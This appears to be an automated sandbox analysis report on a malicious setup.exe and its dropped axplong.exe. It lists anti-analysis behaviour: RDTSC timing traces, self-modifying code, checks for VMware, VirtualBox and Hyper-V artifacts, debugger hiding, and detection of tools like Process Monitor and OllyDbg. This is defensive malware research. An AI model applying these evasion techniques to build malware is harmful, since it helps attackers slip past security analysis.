Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880A6F second address: 4880AA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b jmp 00007FBA24820D9Eh 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007FBA24820D9Ch 0x00000017 mov dword ptr [esp], ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880AA8 second address: 4880AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880AAC second address: 4880AC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880AC9 second address: 4880ACF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880ACF second address: 4880AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880AD3 second address: 4880AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880AD7 second address: 4880AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA24820DA2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880B3B second address: 4880B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880B41 second address: 4880B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c mov edi, esi 0x0000000e mov ax, BABFh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 call 00007FBA24820DA2h 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880B6E second address: 4880BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebx 0x0000000b jmp 00007FBA2516CD56h 0x00000010 mov esp, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FBA2516CD4Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880BA5 second address: 4880BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4880BAB second address: 4880BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD4Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890AE1 second address: 4890AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890AFC second address: 4890B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890B02 second address: 4890B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890B06 second address: 4890B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890B13 second address: 4890B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, 40h 0x00000006 popad 0x00000007 movsx edx, ax 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, ebx 0x00000011 pushfd 0x00000012 jmp 00007FBA24820DA5h 0x00000017 sbb cl, 00000046h 0x0000001a jmp 00007FBA24820DA1h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4890B50 second address: 4890B6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 49107EC second address: 491080E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA24820D9Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 491080E second address: 4910814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4910814 second address: 4910818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 49009C3 second address: 49009C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 49009C8 second address: 49009CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 49009CE second address: 4900A66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FBA2516CD51h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FBA2516CD4Ch 0x00000019 sub al, FFFFFFB8h 0x0000001c jmp 00007FBA2516CD4Bh 0x00000021 popfd 0x00000022 pushad 0x00000023 mov edi, eax 0x00000025 pushfd 0x00000026 jmp 00007FBA2516CD52h 0x0000002b add ecx, 4FC2CB18h 0x00000031 jmp 00007FBA2516CD4Bh 0x00000036 popfd 0x00000037 popad 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b jmp 00007FBA2516CD56h 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4900A66 second address: 4900A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4900A6A second address: 4900A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4900A6E second address: 4900A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4900CE9 second address: 4900D7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FBA2516CD57h 0x00000011 sub cx, E54Eh 0x00000016 jmp 00007FBA2516CD59h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e jmp 00007FBA2516CD4Dh 0x00000023 mov ebp, esp 0x00000025 jmp 00007FBA2516CD4Eh 0x0000002a push dword ptr [ebp+0Ch] 0x0000002d jmp 00007FBA2516CD50h 0x00000032 push dword ptr [ebp+08h] 0x00000035 pushad 0x00000036 mov ecx, 1727EC7Dh 0x0000003b call 00007FBA2516CD4Ah 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4900D7E second address: 4900D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 call 00007FBA24820D99h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA24820D9Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4900D99 second address: 4900D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4900D9F second address: 4900DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4900DA3 second address: 4900DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4900DB1 second address: 4900DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FBA24820D9Bh 0x0000000a sbb ax, FACEh 0x0000000f jmp 00007FBA24820DA9h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4900DE1 second address: 4900E61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FBA2516CD51h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 mov bh, ch 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007FBA2516CD54h 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FBA2516CD4Dh 0x0000002b sub al, FFFFFFC6h 0x0000002e jmp 00007FBA2516CD51h 0x00000033 popfd 0x00000034 jmp 00007FBA2516CD50h 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 976324 second address: 976329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 97651A second address: 976524 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48B06BC second address: 48B06C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48B06C0 second address: 48B06C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48B06C6 second address: 48B06D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA24820D9Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48B06D5 second address: 48B06D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48B06D9 second address: 48B06F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA24820DA0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48B06F6 second address: 48B0776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 call 00007FBA2516CD4Dh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov ecx, edi 0x00000014 pushfd 0x00000015 jmp 00007FBA2516CD59h 0x0000001a xor ch, 00000056h 0x0000001d jmp 00007FBA2516CD51h 0x00000022 popfd 0x00000023 popad 0x00000024 push FFFFFFFEh 0x00000026 jmp 00007FBA2516CD4Eh 0x0000002b push 48B7E3C3h 0x00000030 pushad 0x00000031 call 00007FBA2516CD57h 0x00000036 mov ax, 649Fh 0x0000003a pop ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48B0776 second address: 48B07CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 3E4F23DBh 0x0000000e jmp 00007FBA24820D9Ah 0x00000013 push FECCB455h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FBA24820D9Ah 0x00000021 and cx, 1338h 0x00000026 jmp 00007FBA24820D9Bh 0x0000002b popfd 0x0000002c jmp 00007FBA24820DA8h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 48B07CB second address: 48B07D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: 7CEAFA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: 994C06 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: 9F4D47 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 29EAFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 464C06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 4C4D47 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04900D8D rdtsc

0_2_04900D8D

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 400	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 464	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 862	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 883	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4284	Thread sleep count: 110 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4284	Thread sleep time: -220110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2604	Thread sleep count: 400 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2604	Thread sleep time: -12000000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5352	Thread sleep count: 101 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5352	Thread sleep time: -202101s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1408	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5244	Thread sleep count: 102 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5244	Thread sleep time: -204102s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1776	Thread sleep count: 88 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1776	Thread sleep time: -176088s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5700	Thread sleep count: 93 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5700	Thread sleep time: -186093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2604	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1720	Thread sleep count: 464 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4476	Thread sleep count: 125 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3808	Thread sleep count: 117 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5560	Thread sleep count: 309 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3836	Thread sleep count: 72 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5136	Thread sleep count: 53 > 30	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\setup.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: axplong.exe, axplong.exe, 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorer.exe, 00000009.00000000.2783388537.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Prod_VMware_SATAa
Source: explorer.exe, 00000009.00000000.2785361749.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000003.3095405439.0000000003553000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000009.00000003.3095405439.0000000003553000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000009.00000000.2781222412.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: axplong.exe, 00000007.00000002.3273525737.0000000001259000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`3(
Source: explorer.exe, 00000009.00000000.2783388537.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: axplong.exe, 00000007.00000002.3273525737.0000000001288000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3273525737.000000000126E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2785361749.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000003.3095405439.0000000003553000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000009.00000003.3095405439.0000000003553000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: setup.exe, 00000000.00000002.2066747834.000000000094C000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2095632033.000000000041C000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2105636632.000000000041C000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000009.00000000.2781222412.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.2783388537.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\setup.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	System information queried: CodeIntegrityInformation			Jump to behavior

Hides threads from debuggers

Source: C:\Users\user\Desktop\setup.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_051E0388 Start: 051E03EC End: 051E034B

7_2_051E0388

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
